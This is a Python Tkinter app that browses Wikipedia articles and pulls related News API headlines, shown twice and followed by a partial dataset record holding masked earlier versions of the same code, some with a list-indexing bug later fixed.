from newsapi import NewsApiClient as nac
import datetime
import random
class MainWindow:
    """Tkinter front-end that browses Wikipedia articles and pulls related
    news headlines via the News API.

    The window has two panes: the left pane handles Wikipedia search and
    summary display, the right pane shows News API headlines plus a running
    tally of the most frequently seen article categories.
    """

    def __init__(self):
        # Most recently fetched wikipedia page; None until a search succeeds.
        self.p = None
        self.main_page = tk.Tk()
        self.main_page.title('MetaWikipedia')
        self.main_page.geometry('500x500')
        self.style = ThemedStyle(self.main_page)
        self.style.set_theme('scidblue')
        self.left_pane = ttk.PanedWindow(self.main_page)
        self.right_pane = ttk.PanedWindow(self.main_page)
        # --- Left pane: search controls, article summary, extra metadata ---
        self.search = ttk.Button(self.left_pane, text='Search',
                                 command=self.search_wikipedia)
        self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)
        self.randomize_but = ttk.Button(self.left_pane, text='Randomize',
                                        command=self.randomize)
        self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)
        self.search_box = tk.Text(self.left_pane)
        self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)
        self.summary = tk.Text(self.left_pane, wrap=tk.WORD)
        self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)
        extra_list_choices = ['none', 'categories', 'pageid', 'sections',
                              'html']
        self.extra_list_choice = tk.StringVar()
        self.extra_list_choice.set('none')
        self.extra_list = ttk.OptionMenu(self.left_pane,
                                         self.extra_list_choice,
                                         *extra_list_choices,
                                         command=self.update_choice)
        self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)
        self.other_text = tk.Text(self.left_pane)
        self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
        # --- Right pane: News API key entry, headlines, top categories ---
        self.api_key_label = ttk.Label(self.right_pane, text='API Key')
        self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)
        # NOTE(review): ttk.Entry has no standard 'text' option — confirm this
        # keyword is accepted by the Tk build in use.
        self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')
        self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)
        self.news_box = tk.Text(self.right_pane)
        self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)
        self.top_categories_label = ttk.Label(self.right_pane,
                                              text='Top Categories')
        self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,
                                        relwidth=1)
        self.top_categories = tk.Text(self.right_pane)
        self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
        # Maps category name -> number of searches in which it appeared.
        self.category_map = {}
        # Seed the UI with a random article before entering the event loop.
        self.randomize()
        self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)
        self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)
        self.main_page.mainloop()

    def search_wikipedia(self):
        """Look up the search-box text on Wikipedia and show its summary.

        Uses the first search suggestion; if that title is ambiguous, the
        first disambiguation option is used instead of raising.
        """
        self.summary.delete('1.0', tk.END)
        possibilities = wk.search(self.search_box.get('1.0', tk.END)
                                  .replace('\n', ''))
        if len(possibilities) > 0:
            try:
                p = wk.page(possibilities[0])
            except wk.DisambiguationError as e:
                # Ambiguous title: fall back to the first concrete option.
                p = wk.page(e.options[0])
            self.summary.configure(state='normal')
            self.summary.delete('1.0', tk.END)
            self.summary.insert('1.0', p.summary)
            self.summary.configure(state='disabled')
            self.p = p
            self.update_category_map(p.categories)
            self.get_news()
        return None

    def update_choice(self, value):
        """Show the selected piece of page metadata in the extra text box.

        ``value`` is one of the OptionMenu choices ('none', 'categories',
        'pageid', 'sections', 'html'). Does nothing before the first
        successful search (``self.p`` still None).
        """
        if self.p is not None:
            if value == 'none':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', '')
            elif value == 'categories':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.categories)
            elif value == 'pageid':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.pageid)
            elif value == 'sections':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.sections)
            elif value == 'html':
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.html())

    def randomize(self):
        """Load a random Wikipedia article title and search for it."""
        self.search_box.delete('1.0', tk.END)
        self.search_box.insert('1.0', wk.random())
        self.search_wikipedia()

    def update_category_map(self, category_list):
        """Fold a page's categories into the running hit counts.

        Wikipedia-internal housekeeping categories (maintenance, sourcing,
        stubs, archives) are skipped so the tally reflects actual topics.
        """
        for category in category_list:
            lowered = category.lower()
            # Skip Wikipedia-internal maintenance categories.
            if any(word in lowered for word in
                   ('wiki', 'sources', 'article', 'stub', 'wayback', 'cs1')):
                continue
            self.category_map[category] = self.category_map.get(category, 0) + 1
        self.update_top_categories()

    def update_top_categories(self):
        """Render the most-seen categories into the read-only text box."""
        display = ''
        for cat in self.sorted_categories():
            hit = 'hits' if self.category_map[cat] > 1 else 'hit'
            display += f'{cat}, {self.category_map[cat]} {hit}\n'
        self.top_categories.configure(state='normal')
        self.top_categories.delete('1.0', tk.END)
        self.top_categories.insert('1.0', display)
        self.top_categories.configure(state='disabled')

    def sorted_categories(self):
        """Return up to five category names, most frequently seen first."""
        ranked = sorted(self.category_map, key=self.category_map.get,
                        reverse=True)
        return ranked[:5]

    def get_news(self):
        """Fetch top headlines related to the current top categories.

        No-op when the API key entry is empty. Headlines replace any
        previous contents of the news box.
        """
        if self.api_key_entry.get() == '':
            return None
        api = nac(api_key=self.api_key_entry.get())
        query = ''
        for cat in self.sorted_categories():
            query += f'{cat},'
        search = api.get_top_headlines(q=query,
                                       sources='bbc-news,the-verge',
                                       language='en')
        news = ''
        # BUG FIX: search['articles'] is a list of article dicts, so iterate
        # the dicts directly; the old code indexed the list with a dict
        # (TypeError whenever any headline came back).
        for article in search['articles']:
            news += f"{article['title']}\n"
        self.news_box.delete('1.0', tk.END)
        self.news_box.insert('1.0', news)
# Launch the GUI; MainWindow() blocks in Tk's mainloop until the window closes.
if __name__ == '__main__':
    main_window = MainWindow()
<|reserved_special_token_1|>
"""main.py"""
import tkinter as tk
from tkinter import ttk
from ttkthemes import ThemedStyle
import wikipedia as wk
from newsapi import NewsApiClient as nac
import datetime
import random
class MainWindow:
    """Tkinter front-end that browses Wikipedia articles and pulls related
    news headlines via the News API.

    The window has two panes: the left pane handles Wikipedia search and
    summary display, the right pane shows News API headlines plus a running
    tally of the most frequently seen article categories.
    """

    def __init__(self):
        # Most recently fetched wikipedia page; None until a search succeeds.
        self.p = None
        self.main_page = tk.Tk()
        self.main_page.title("MetaWikipedia")
        self.main_page.geometry("500x500")
        self.style = ThemedStyle(self.main_page)
        self.style.set_theme("scidblue")
        self.left_pane = ttk.PanedWindow(self.main_page)
        self.right_pane = ttk.PanedWindow(self.main_page)
        # --- Left pane: search controls, article summary, extra metadata ---
        self.search = ttk.Button(self.left_pane, text="Search",
                                 command=self.search_wikipedia)
        self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)
        self.randomize_but = ttk.Button(self.left_pane, text="Randomize",
                                        command=self.randomize)
        self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)
        self.search_box = tk.Text(self.left_pane)
        self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)
        self.summary = tk.Text(self.left_pane, wrap=tk.WORD)
        self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)
        extra_list_choices = ["none", "categories", "pageid", "sections",
                              "html"]
        self.extra_list_choice = tk.StringVar()
        self.extra_list_choice.set("none")
        self.extra_list = ttk.OptionMenu(self.left_pane,
                                         self.extra_list_choice,
                                         *extra_list_choices,
                                         command=self.update_choice)
        self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)
        self.other_text = tk.Text(self.left_pane)
        self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
        # --- Right pane: News API key entry, headlines, top categories ---
        self.api_key_label = ttk.Label(self.right_pane, text="API Key")
        self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)
        # NOTE(review): ttk.Entry has no standard 'text' option — confirm this
        # keyword is accepted by the Tk build in use.
        self.api_key_entry = ttk.Entry(self.right_pane, text="ABC...")
        self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)
        self.news_box = tk.Text(self.right_pane)
        self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)
        self.top_categories_label = ttk.Label(self.right_pane,
                                              text="Top Categories")
        self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,
                                        relwidth=1)
        self.top_categories = tk.Text(self.right_pane)
        self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
        # Maps category name -> number of searches in which it appeared.
        self.category_map = {}
        # Seed the UI with a random article before entering the event loop.
        self.randomize()
        self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)
        self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)
        self.main_page.mainloop()

    def search_wikipedia(self):
        """Look up the search-box text on Wikipedia and show its summary.

        Uses the first search suggestion; if that title is ambiguous, the
        first disambiguation option is used instead of raising.
        """
        self.summary.delete('1.0', tk.END)
        possibilities = wk.search(self.search_box.get('1.0', tk.END)
                                  .replace("\n", ""))
        if len(possibilities) > 0:
            try:
                p = wk.page(possibilities[0])
            except wk.DisambiguationError as e:
                # Ambiguous title: fall back to the first concrete option.
                p = wk.page(e.options[0])
            self.summary.configure(state="normal")
            self.summary.delete('1.0', tk.END)
            self.summary.insert('1.0', p.summary)
            self.summary.configure(state="disabled")
            self.p = p
            self.update_category_map(p.categories)
            self.get_news()
        return None

    def update_choice(self, value):
        """Show the selected piece of page metadata in the extra text box.

        ``value`` is one of the OptionMenu choices ("none", "categories",
        "pageid", "sections", "html"). Does nothing before the first
        successful search (``self.p`` still None).
        """
        if self.p is not None:
            if value == "none":
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', "")
            elif value == "categories":
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.categories)
            elif value == "pageid":
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.pageid)
            elif value == "sections":
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.sections)
            elif value == "html":
                self.other_text.delete('1.0', tk.END)
                self.other_text.insert('1.0', self.p.html())

    def randomize(self):
        """Load a random Wikipedia article title and search for it."""
        self.search_box.delete('1.0', tk.END)
        self.search_box.insert('1.0', wk.random())
        self.search_wikipedia()

    def update_category_map(self, category_list):
        """Fold a page's categories into the running hit counts.

        Wikipedia-internal housekeeping categories (maintenance, sourcing,
        stubs, archives) are skipped so the tally reflects actual topics.
        """
        for category in category_list:
            lowered = category.lower()
            # Skip Wikipedia-internal maintenance categories.
            if any(word in lowered for word in
                   ("wiki", "sources", "article", "stub", "wayback", "cs1")):
                continue
            self.category_map[category] = self.category_map.get(category, 0) + 1
        self.update_top_categories()

    def update_top_categories(self):
        """Render the most-seen categories into the read-only text box."""
        display = ""
        for cat in self.sorted_categories():
            hit = "hits" if self.category_map[cat] > 1 else "hit"
            display += f"{cat}, {self.category_map[cat]} {hit}\n"
        self.top_categories.configure(state="normal")
        self.top_categories.delete('1.0', tk.END)
        self.top_categories.insert('1.0', display)
        self.top_categories.configure(state="disabled")

    def sorted_categories(self):
        """Return up to five category names, most frequently seen first."""
        ranked = sorted(self.category_map, key=self.category_map.get,
                        reverse=True)
        return ranked[:5]

    def get_news(self):
        """Fetch top headlines related to the current top categories.

        No-op when the API key entry is empty. Headlines replace any
        previous contents of the news box.
        """
        if self.api_key_entry.get() == "":
            return None
        api = nac(api_key=self.api_key_entry.get())
        query = ""
        for cat in self.sorted_categories():
            query += f"{cat},"
        search = api.get_top_headlines(q=query,
                                       sources="bbc-news,the-verge",
                                       language="en")
        news = ""
        # BUG FIX: search["articles"] is a list of article dicts, so iterate
        # the dicts directly; the old code indexed the list with a dict
        # (TypeError whenever any headline came back).
        for article in search["articles"]:
            news += f"{article['title']}\n"
        self.news_box.delete('1.0', tk.END)
        self.news_box.insert('1.0', news)
if __name__ == "__main__":
    # Constructing MainWindow builds the UI and blocks in tk's mainloop.
    main_window = MainWindow()
|
flexible
|
{
"blob_id": "874fa927a1c0f1beeb31ca7b0de7fd2b16218ea4",
"index": 2756,
"step-1": "<mask token>\n\n\nclass MainWindow:\n <mask token>\n <mask token>\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0', tk.END).\n replace('\\n', ''))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state='normal')\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state='disabled')\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == 'none':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', '')\n if value == 'categories':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == 'pageid':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == 'sections':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == 'html':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:\n if i in category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories 
text box.\"\"\"\n cats = self.sorted_categories()\n display = ''\n for cat in cats:\n hit = 'hits' if self.category_map[cat] > 1 else 'hit'\n display += f'{cat}, {self.category_map[cat]} {hit}\\n'\n self.top_categories.configure(state='normal')\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state='disabled')\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == '':\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = now - datetime.timedelta(days=14)\n query = ''\n for cat in self.sorted_categories():\n query += f'{cat},'\n search = api.get_top_headlines(q=query, sources=\n 'bbc-news,the-verge', language='en')\n news = ''\n for article in search['articles']:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MainWindow:\n <mask token>\n\n def __init__(self):\n self.p = None\n self.main_page = tk.Tk()\n self.main_page.title('MetaWikipedia')\n self.main_page.geometry('500x500')\n self.style = ThemedStyle(self.main_page)\n self.style.set_theme('scidblue')\n self.left_pane = ttk.PanedWindow(self.main_page)\n self.right_pane = ttk.PanedWindow(self.main_page)\n self.search = ttk.Button(self.left_pane, text='Search', command=\n self.search_wikipedia)\n self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)\n self.randomize_but = ttk.Button(self.left_pane, text='Randomize',\n command=self.randomize)\n self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)\n self.search_box = tk.Text(self.left_pane)\n self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)\n self.summary = tk.Text(self.left_pane, wrap=tk.WORD)\n self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)\n extra_list_choices = ['none', 'categories', 'pageid', 'sections',\n 'html']\n self.extra_list_choice = tk.StringVar()\n self.extra_list_choice.set('none')\n self.extra_list = ttk.OptionMenu(self.left_pane, self.\n extra_list_choice, *extra_list_choices, command=self.update_choice)\n self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)\n self.other_text = tk.Text(self.left_pane)\n self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.api_key_label = ttk.Label(self.right_pane, text='API Key')\n self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)\n self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')\n self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)\n self.news_box = tk.Text(self.right_pane)\n self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)\n self.top_categories_label = ttk.Label(self.right_pane, text=\n 'Top Categories')\n self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,\n relwidth=1)\n self.top_categories = 
tk.Text(self.right_pane)\n self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.category_map = {}\n self.randomize()\n self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)\n self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)\n self.main_page.mainloop()\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0', tk.END).\n replace('\\n', ''))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state='normal')\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state='disabled')\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == 'none':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', '')\n if value == 'categories':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == 'pageid':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == 'sections':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == 'html':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:\n if i in category.lower():\n skip = True\n if 
skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = ''\n for cat in cats:\n hit = 'hits' if self.category_map[cat] > 1 else 'hit'\n display += f'{cat}, {self.category_map[cat]} {hit}\\n'\n self.top_categories.configure(state='normal')\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state='disabled')\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == '':\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = now - datetime.timedelta(days=14)\n query = ''\n for cat in self.sorted_categories():\n query += f'{cat},'\n search = api.get_top_headlines(q=query, sources=\n 'bbc-news,the-verge', language='en')\n news = ''\n for article in search['articles']:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MainWindow:\n \"\"\"Application controller object.\"\"\"\n\n def __init__(self):\n self.p = None\n self.main_page = tk.Tk()\n self.main_page.title('MetaWikipedia')\n self.main_page.geometry('500x500')\n self.style = ThemedStyle(self.main_page)\n self.style.set_theme('scidblue')\n self.left_pane = ttk.PanedWindow(self.main_page)\n self.right_pane = ttk.PanedWindow(self.main_page)\n self.search = ttk.Button(self.left_pane, text='Search', command=\n self.search_wikipedia)\n self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)\n self.randomize_but = ttk.Button(self.left_pane, text='Randomize',\n command=self.randomize)\n self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)\n self.search_box = tk.Text(self.left_pane)\n self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)\n self.summary = tk.Text(self.left_pane, wrap=tk.WORD)\n self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)\n extra_list_choices = ['none', 'categories', 'pageid', 'sections',\n 'html']\n self.extra_list_choice = tk.StringVar()\n self.extra_list_choice.set('none')\n self.extra_list = ttk.OptionMenu(self.left_pane, self.\n extra_list_choice, *extra_list_choices, command=self.update_choice)\n self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)\n self.other_text = tk.Text(self.left_pane)\n self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.api_key_label = ttk.Label(self.right_pane, text='API Key')\n self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)\n self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')\n self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)\n self.news_box = tk.Text(self.right_pane)\n self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)\n self.top_categories_label = ttk.Label(self.right_pane, text=\n 'Top Categories')\n self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,\n relwidth=1)\n 
self.top_categories = tk.Text(self.right_pane)\n self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.category_map = {}\n self.randomize()\n self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)\n self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)\n self.main_page.mainloop()\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0', tk.END).\n replace('\\n', ''))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state='normal')\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state='disabled')\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == 'none':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', '')\n if value == 'categories':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == 'pageid':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == 'sections':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == 'html':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:\n if i in 
category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = ''\n for cat in cats:\n hit = 'hits' if self.category_map[cat] > 1 else 'hit'\n display += f'{cat}, {self.category_map[cat]} {hit}\\n'\n self.top_categories.configure(state='normal')\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state='disabled')\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == '':\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = now - datetime.timedelta(days=14)\n query = ''\n for cat in self.sorted_categories():\n query += f'{cat},'\n search = api.get_top_headlines(q=query, sources=\n 'bbc-news,the-verge', language='en')\n news = ''\n for article in search['articles']:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\nif __name__ == '__main__':\n main_window = MainWindow()\n",
"step-4": "<mask token>\nimport tkinter as tk\nfrom tkinter import ttk\nfrom ttkthemes import ThemedStyle\nimport wikipedia as wk\nfrom newsapi import NewsApiClient as nac\nimport datetime\nimport random\n\n\nclass MainWindow:\n \"\"\"Application controller object.\"\"\"\n\n def __init__(self):\n self.p = None\n self.main_page = tk.Tk()\n self.main_page.title('MetaWikipedia')\n self.main_page.geometry('500x500')\n self.style = ThemedStyle(self.main_page)\n self.style.set_theme('scidblue')\n self.left_pane = ttk.PanedWindow(self.main_page)\n self.right_pane = ttk.PanedWindow(self.main_page)\n self.search = ttk.Button(self.left_pane, text='Search', command=\n self.search_wikipedia)\n self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)\n self.randomize_but = ttk.Button(self.left_pane, text='Randomize',\n command=self.randomize)\n self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)\n self.search_box = tk.Text(self.left_pane)\n self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)\n self.summary = tk.Text(self.left_pane, wrap=tk.WORD)\n self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)\n extra_list_choices = ['none', 'categories', 'pageid', 'sections',\n 'html']\n self.extra_list_choice = tk.StringVar()\n self.extra_list_choice.set('none')\n self.extra_list = ttk.OptionMenu(self.left_pane, self.\n extra_list_choice, *extra_list_choices, command=self.update_choice)\n self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)\n self.other_text = tk.Text(self.left_pane)\n self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.api_key_label = ttk.Label(self.right_pane, text='API Key')\n self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)\n self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')\n self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)\n self.news_box = tk.Text(self.right_pane)\n self.news_box.place(relx=0, rely=0.1, relheight=0.5, 
relwidth=1)\n self.top_categories_label = ttk.Label(self.right_pane, text=\n 'Top Categories')\n self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,\n relwidth=1)\n self.top_categories = tk.Text(self.right_pane)\n self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.category_map = {}\n self.randomize()\n self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)\n self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)\n self.main_page.mainloop()\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0', tk.END).\n replace('\\n', ''))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state='normal')\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state='disabled')\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == 'none':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', '')\n if value == 'categories':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == 'pageid':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == 'sections':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == 'html':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the 
